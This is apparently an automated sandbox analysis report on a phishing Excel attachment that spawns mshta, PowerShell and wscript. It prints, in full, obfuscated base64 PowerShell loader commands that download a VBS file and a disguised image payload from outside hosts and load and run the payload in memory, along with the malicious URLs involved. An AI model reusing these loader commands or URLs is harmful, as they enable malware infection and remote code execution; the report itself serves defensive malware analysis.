Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C8F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.000000000226E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.00000000022C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.506734077.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557237149.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.00000000022C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491168504.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485939637.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/.
Source: mshta.exe, 00000004.00000003.491168504.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485939637.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/0M
Source: mshta.exe, 00000004.00000002.491456318.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000548000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491168504.0000000000548000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485939637.0000000000528000.00000004.00000020.00020000.00000000.sdmp, SOA USD67,353.35.xla.xlsx	String found in binary or memory: https://jktc.pro/yyKnY4?&blow=cold&peacoat
Source: mshta.exe, 00000004.00000002.491456318.00000000004EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/yyKnY4?&blow=cold&peacoat4
Source: mshta.exe, 00000004.00000002.491456318.00000000004EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jktc.pro/yyKnY4?&blow=cold&peacoat7
Source: powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.557237149.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 0000000C.00000002.557237149.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Source: powershell.exe, 0000000C.00000002.557237149.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
Source: mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C8F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.000000000226E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown	HTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49163 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: SOA USD67,353.35.xla.xlsx	OLE: Microsoft Excel 2007+
Source: SOA USD67,353.35.xla.xlsx	OLE: Microsoft Excel 2007+
Source: SOA USD67,353.35.xla.xlsx	OLE: Microsoft Excel 2007+
Source: SOA USD67,353.35.xla.xlsx	OLE: Microsoft Excel 2007+
Source: ~DF090E1EE033FA1134.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DFF3B9FCE37B1970AF.TMP.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_000007FE8993352E

7_2_000007FE8993352E

Source: SOA USD67,353.35.xla.xlsx

OLE indicator, VBA macros: true

Source: SOA USD67,353.35.xla.xlsx

Stream path 'MBD0067A7CC/\x1Ole' : https://jktc.pro/yyKnY4?&blow=cold&peacoatbO97fE4^{{z9jUOXtPAPYdIehqZiNPbeLJUV7hDmpxEpcp7lwNIJdSa3HRYfHTNgk6NeCQdWOYk13W1RtiSg8Ez08JHtASInxLcb4mxHKHp4qZoDpxEEyLIAe2XoIZ42xwCgZrYX3l2SpIMPACj&u N&$33+&Kyl

Source: ~DF090E1EE033FA1134.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF3B9FCE37B1970AF.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2041
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2008
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2041	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2008	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winXLSX@15/25@12/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$SOA USD67,353.35.xla.xlsx

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9185.tmp

Jump to behavior

Source: SOA USD67,353.35.xla.xlsx

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................Y.......Y.....}..w.............................1......(.P..............3......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................l......a$k....}..w............\.......................(.P.....................H.l.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............:b......`$k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................l......a$k....}..w............\.......................(.P.....................H.l.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............:b......`$k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......l.....N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..:b......`$k......a.....(.P.......................l..... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............:b......`$k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...................l.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............:b......`$k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....l.....N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............:b......`$k......a.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w.............:b......`$k......a.....(.P.......................l.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................0...p2...WX.....}..w....H.l.....@E......^...............(.P.......................l.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ....................................p2...WX.....}..w....H.l.....@E......^...............(.P.......................l.............................	Jump to behavior
